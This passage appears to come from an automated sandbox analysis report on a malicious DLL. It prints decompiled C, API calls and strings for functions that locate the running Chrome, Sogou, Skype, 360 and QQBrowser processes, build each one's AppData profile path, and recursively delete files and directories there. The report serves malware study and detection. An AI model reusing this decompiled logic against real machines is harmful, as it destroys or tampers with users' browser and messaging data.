				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L1001580C();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return 0;
			}

0x10006028
0x10006036
0x1000603e
0x10006043
0x10006056
0x1000605f
0x10006064
0x10006068
0x10006070
0x10006072
0x10006076
0x10006077
0x1000607f
0x10006080
0x10006083
0x10006088
0x10006089
0x1000608e
0x10006093
0x10006097
0x1000609b
0x1000609c
0x100060a4
0x100060a8
0x100060b2
0x100060c0
0x100060c1
0x100060c6
0x100060ce
0x100060d3
0x100060da
0x100060e4
0x100060ec

APIs

__EH_prolog.LIBCMT ref: 10006028
#537.MFC42(SogouExplorer.exe), ref: 1000603E

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10006056
#540.MFC42 ref: 1000605F
#1140.MFC42(?,?,00000002,0000005C), ref: 10006077
#926.MFC42(?,C:\Users\,?,?,?,00000002,0000005C), ref: 10006089
#924.MFC42(?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?,?,?,00000002,0000005C), ref: 1000609C
#800.MFC42(?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?,?,?,00000002,0000005C), ref: 100060A8
Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?,?,?,00000002,0000005C), ref: 100060B2

Part of subcall function 10005B32: __EH_prolog.LIBCMT ref: 10005B37
Part of subcall function 10005B32: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
Part of subcall function 10005B32: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
Part of subcall function 10005B32: ?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
Part of subcall function 10005B32: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
Part of subcall function 10005B32: FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BDF
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BF3
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
Part of subcall function 10005B32: FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
Part of subcall function 10005B32: FindClose.KERNEL32(00000000), ref: 10005C7A
Part of subcall function 10005B32: RemoveDirectoryA.KERNEL32(?), ref: 10005C83
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

#800.MFC42 ref: 100060CE
#800.MFC42 ref: 100060DA

Strings

C:\Users\, xrefs: 10006083
SogouExplorer.exe, xrefs: 10006039
\AppData\Roaming\SogouExplorer, xrefs: 1000608E

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$#800$??1?$basic_string@FindH_prolog$?c_str@?$basic_string@D@2@@0@FileFirstHstd@@V10@V?$basic_string@_strcmpi$#1140#537#540#924#926??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseCreateD@1@@DirectoryFolderNextPathProcess32RemoveSleepSnapshotSpecialToolhelp32V01@Y?$basic_string@
String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
API String ID: 3922300693-2055279553
Opcode ID: e66bf8869960dd7048671d86cef4ecd8b40b7806c6e865973bef9e87e525911a
Instruction ID: 8569cb60cb43544dc5886b646014a925a8c533965d283d2e2a829b44585d7734
Opcode Fuzzy Hash: e66bf8869960dd7048671d86cef4ecd8b40b7806c6e865973bef9e87e525911a
Instruction Fuzzy Hash: 6F117C75D10209EAEB14DBA0CC46FEEB778EF10302F104155B211BA0C1DF75AB488A61

Uniqueness

Uniqueness Score: -1.00%

Function 10005CBB, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 59
sleepCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10005CBB(void* __ecx) {
				void* _t30;
				void* _t45;
				void* _t47;

				E100158AC(E1001A27C, _t45);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47 - 0x110;
				L10015818();
				E1000490A();
				 *0x100273bc(0, _t45 - 0x11c, 7, 0, "chrome.exe", __ecx);
				L10015842();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(0x5c);
				_push(2);
				_push(_t45 - 0x11c);
				_push(_t45 - 0x14);
				L1001583C();
				_push(_t45 - 0x14);
				_t30 = _t45 - 0x18;
				_push("C:\\Users\\");
				_push(_t30);
				L10015836();
				_push("\\AppData\\Local\\Google\\Chrome\\User Data\\Default");
				_push(_t30);
				 *(_t45 - 4) = 1;
				_push(_t45 - 0x10);
				L10015830();
				 *(_t45 - 4) = 3;
				L1001580C();
				Sleep(0x3e8);
				_push(E1000865D(_t45 - 0x10));
				E10005B32();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L1001580C();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return 0;
			}

0x10005cc0
0x10005cce
0x10005cd6
0x10005cdb
0x10005cee
0x10005cf7
0x10005cfc
0x10005d00
0x10005d08
0x10005d0a
0x10005d0e
0x10005d0f
0x10005d17
0x10005d18
0x10005d1b
0x10005d20
0x10005d21
0x10005d26
0x10005d2b
0x10005d2f
0x10005d33
0x10005d34
0x10005d3c
0x10005d40
0x10005d4a
0x10005d58
0x10005d59
0x10005d5e
0x10005d66
0x10005d6b
0x10005d72
0x10005d7c
0x10005d84

APIs

__EH_prolog.LIBCMT ref: 10005CC0
#537.MFC42(chrome.exe), ref: 10005CD6

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10005CEE
#540.MFC42 ref: 10005CF7
#1140.MFC42(?,?,00000002,0000005C), ref: 10005D0F
#926.MFC42(?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005D21
#924.MFC42(?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005D34
#800.MFC42(?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005D40
Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005D4A

Part of subcall function 10005B32: __EH_prolog.LIBCMT ref: 10005B37
Part of subcall function 10005B32: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
Part of subcall function 10005B32: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
Part of subcall function 10005B32: ?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
Part of subcall function 10005B32: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
Part of subcall function 10005B32: FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BDF
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BF3
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
Part of subcall function 10005B32: FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
Part of subcall function 10005B32: FindClose.KERNEL32(00000000), ref: 10005C7A
Part of subcall function 10005B32: RemoveDirectoryA.KERNEL32(?), ref: 10005C83
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

#800.MFC42 ref: 10005D66
#800.MFC42 ref: 10005D72

Strings

C:\Users\, xrefs: 10005D1B
chrome.exe, xrefs: 10005CD1
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 10005D26

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$#800$??1?$basic_string@FindH_prolog$?c_str@?$basic_string@D@2@@0@FileFirstHstd@@V10@V?$basic_string@_strcmpi$#1140#537#540#924#926??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseCreateD@1@@DirectoryFolderNextPathProcess32RemoveSleepSnapshotSpecialToolhelp32V01@Y?$basic_string@
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 3922300693-2559963756
Opcode ID: 79ed7c0583a60dfa393b730b9cf0d66a9718896c88d92cb3b17d46de91eed2de
Instruction ID: f9c11d5f6099f8fd142b2db2be12b5d13cb7f26f33c4908e3bc44849a0f87be9
Opcode Fuzzy Hash: 79ed7c0583a60dfa393b730b9cf0d66a9718896c88d92cb3b17d46de91eed2de
Instruction Fuzzy Hash: B7117975C10209EAEB14EBE0CC46FEEBB78EF14301F504169F211BA0C2DF75AB488A61

Uniqueness

Uniqueness Score: -1.00%

Function 10005D87, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 59
sleepCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10005D87(void* __ecx) {
				void* _t30;
				void* _t45;
				void* _t47;

				E100158AC(E1001A29E, _t45);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47 - 0x110;
				L10015818();
				E1000490A();
				 *0x100273bc(0, _t45 - 0x11c, 7, 0, "Skype.exe", __ecx);
				L10015842();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(0x5c);
				_push(2);
				_push(_t45 - 0x11c);
				_push(_t45 - 0x14);
				L1001583C();
				_push(_t45 - 0x14);
				_t30 = _t45 - 0x18;
				_push("C:\\Users\\");
				_push(_t30);
				L10015836();
				_push("\\AppData\\Roaming\\Microsoft\\Skype for Desktop");
				_push(_t30);
				 *(_t45 - 4) = 1;
				_push(_t45 - 0x10);
				L10015830();
				 *(_t45 - 4) = 3;
				L1001580C();
				Sleep(0x3e8);
				_push(E1000865D(_t45 - 0x10));
				E10005B32();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L1001580C();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return 0;
			}

0x10005d8c
0x10005d9a
0x10005da2
0x10005da7
0x10005dba
0x10005dc3
0x10005dc8
0x10005dcc
0x10005dd4
0x10005dd6
0x10005dda
0x10005ddb
0x10005de3
0x10005de4
0x10005de7
0x10005dec
0x10005ded
0x10005df2
0x10005df7
0x10005dfb
0x10005dff
0x10005e00
0x10005e08
0x10005e0c
0x10005e16
0x10005e24
0x10005e25
0x10005e2a
0x10005e32
0x10005e37
0x10005e3e
0x10005e48
0x10005e50

APIs

__EH_prolog.LIBCMT ref: 10005D8C
#537.MFC42(Skype.exe), ref: 10005DA2

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10005DBA
#540.MFC42 ref: 10005DC3
#1140.MFC42(?,?,00000002,0000005C), ref: 10005DDB
#926.MFC42(?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005DED
#924.MFC42(?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005E00
#800.MFC42(?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005E0C
Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005E16

Part of subcall function 10005B32: __EH_prolog.LIBCMT ref: 10005B37
Part of subcall function 10005B32: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
Part of subcall function 10005B32: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
Part of subcall function 10005B32: ?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
Part of subcall function 10005B32: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
Part of subcall function 10005B32: FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BDF
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BF3
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
Part of subcall function 10005B32: FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
Part of subcall function 10005B32: FindClose.KERNEL32(00000000), ref: 10005C7A
Part of subcall function 10005B32: RemoveDirectoryA.KERNEL32(?), ref: 10005C83
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

#800.MFC42 ref: 10005E32
#800.MFC42 ref: 10005E3E

Strings

C:\Users\, xrefs: 10005DE7
\AppData\Roaming\Microsoft\Skype for Desktop, xrefs: 10005DF2
Skype.exe, xrefs: 10005D9D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$#800$??1?$basic_string@FindH_prolog$?c_str@?$basic_string@D@2@@0@FileFirstHstd@@V10@V?$basic_string@_strcmpi$#1140#537#540#924#926??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseCreateD@1@@DirectoryFolderNextPathProcess32RemoveSleepSnapshotSpecialToolhelp32V01@Y?$basic_string@
String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
API String ID: 3922300693-3499480952
Opcode ID: eaafa1f1657cb813e88c4848be7d6b74bb6cf22b56de336946b5d75d23954037
Instruction ID: 6c39670c56985e140aec15590fc012270125cadf42e7cb1e852cd82269718fab
Opcode Fuzzy Hash: eaafa1f1657cb813e88c4848be7d6b74bb6cf22b56de336946b5d75d23954037
Instruction Fuzzy Hash: 96117975C10209EAEB15DBA4CC46FEEB778EF10301F504169B202BA0C1DF75AB488B61

Uniqueness

Uniqueness Score: -1.00%

Function 10005E8B, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 59
sleepCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10005E8B(void* __ecx) {
				void* _t30;
				void* _t45;
				void* _t47;

				E100158AC(E1001A2C0, _t45);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47 - 0x110;
				L10015818();
				E1000490A();
				 *0x100273bc(0, _t45 - 0x11c, 7, 0, "360se6.exe", __ecx);
				L10015842();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(0x5c);
				_push(2);
				_push(_t45 - 0x11c);
				_push(_t45 - 0x14);
				L1001583C();
				_push(_t45 - 0x14);
				_t30 = _t45 - 0x18;
				_push("C:\\Users\\");
				_push(_t30);
				L10015836();
				_push("\\AppData\\Roaming\\360se6\\User Data\\Default");
				_push(_t30);
				 *(_t45 - 4) = 1;
				_push(_t45 - 0x10);
				L10015830();
				 *(_t45 - 4) = 3;
				L1001580C();
				Sleep(0x3e8);
				_push(E1000865D(_t45 - 0x10));
				E10005B32();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L1001580C();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return 0;
			}

0x10005e90
0x10005e9e
0x10005ea6
0x10005eab
0x10005ebe
0x10005ec7
0x10005ecc
0x10005ed0
0x10005ed8
0x10005eda
0x10005ede
0x10005edf
0x10005ee7
0x10005ee8
0x10005eeb
0x10005ef0
0x10005ef1
0x10005ef6
0x10005efb
0x10005eff
0x10005f03
0x10005f04
0x10005f0c
0x10005f10
0x10005f1a
0x10005f28
0x10005f29
0x10005f2e
0x10005f36
0x10005f3b
0x10005f42
0x10005f4c
0x10005f54

APIs

__EH_prolog.LIBCMT ref: 10005E90
#537.MFC42(360se6.exe), ref: 10005EA6

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10005EBE
#540.MFC42 ref: 10005EC7
#1140.MFC42(?,?,00000002,0000005C), ref: 10005EDF
#926.MFC42(?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005EF1
#924.MFC42(?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005F04
#800.MFC42(?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005F10
Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005F1A

Part of subcall function 10005B32: __EH_prolog.LIBCMT ref: 10005B37
Part of subcall function 10005B32: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
Part of subcall function 10005B32: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
Part of subcall function 10005B32: ?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
Part of subcall function 10005B32: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
Part of subcall function 10005B32: FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BDF
Part of subcall function 10005B32: _strcmpi.MSVCRT ref: 10005BF3
Part of subcall function 10005B32: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
Part of subcall function 10005B32: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
Part of subcall function 10005B32: FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
Part of subcall function 10005B32: FindClose.KERNEL32(00000000), ref: 10005C7A
Part of subcall function 10005B32: RemoveDirectoryA.KERNEL32(?), ref: 10005C83
Part of subcall function 10005B32: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

#800.MFC42 ref: 10005F36
#800.MFC42 ref: 10005F42

Strings

360se6.exe, xrefs: 10005EA1
C:\Users\, xrefs: 10005EEB
\AppData\Roaming\360se6\User Data\Default, xrefs: 10005EF6

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$#800$??1?$basic_string@FindH_prolog$?c_str@?$basic_string@D@2@@0@FileFirstHstd@@V10@V?$basic_string@_strcmpi$#1140#537#540#924#926??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseCreateD@1@@DirectoryFolderNextPathProcess32RemoveSleepSnapshotSpecialToolhelp32V01@Y?$basic_string@
String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
API String ID: 3922300693-1244823433
Opcode ID: c6de08ccad70167cfaffda339b26e1770ed5812cedc1be27df810a4baee958bd
Instruction ID: d9630fd6a49e41d0f7b53764b9d6969d4755a7892e573cb9410b0d41215e363f
Opcode Fuzzy Hash: c6de08ccad70167cfaffda339b26e1770ed5812cedc1be27df810a4baee958bd
Instruction Fuzzy Hash: 53118E75C10249EAEB14DBA4CC46FEEB778EF14302F504055F211BA0C1DF75AB488B61

Uniqueness

Uniqueness Score: -1.00%

Function 10005F57, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 59
sleepCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10005F57(void* __ecx) {
				void* _t30;
				void* _t45;
				void* _t47;

				E100158AC(E1001A2E2, _t45);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47 - 0x110;
				L10015818();
				E1000490A();
				 *0x100273bc(0, _t45 - 0x11c, 7, 0, "QQBrowser.exe", __ecx);
				L10015842();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(0x5c);
				_push(2);
				_push(_t45 - 0x11c);
				_push(_t45 - 0x14);
				L1001583C();
				_push(_t45 - 0x14);
				_t30 = _t45 - 0x18;
				_push("C:\\Users\\");
				_push(_t30);
				L10015836();
				_push("\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default");
				_push(_t30);
				 *(_t45 - 4) = 1;
				_push(_t45 - 0x10);
				L10015830();
				 *(_t45 - 4) = 3;
				L1001580C();
				Sleep(0x3e8);
				_push(E1000865D(_t45 - 0x10));
				E10005B32();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				L1001580C();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return 0;
			}

0x10005f5c
0x10005f6a
0x10005f72
0x10005f77
0x10005f8a
0x10005f93
0x10005f98
0x10005f9c
0x10005fa4
0x10005fa6
0x10005faa
0x10005fab
0x10005fb3
0x10005fb4
0x10005fb7
0x10005fbc
0x10005fbd
0x10005fc2
0x10005fc7
0x10005fcb
0x10005fcf
0x10005fd0
0x10005fd8
0x10005fdc
0x10005fe6
0x10005ff4
0x10005ff5
0x10005ffa
0x10006002
0x10006007
0x1000600e
0x10006018
0x10006020

APIs

__EH_prolog.LIBCMT ref: 10005F5C
#537.MFC42(QQBrowser.exe), ref: 10005F72

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10005F8A
#540.MFC42 ref: 10005F93
#1140.MFC42(?,?,00000002,0000005C), ref: 10005FAB
#926.MFC42(?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005FBD
#924.MFC42(?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005FD0
#800.MFC42(?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?,?,?,00000002,0000005C), ref: 10005FDC
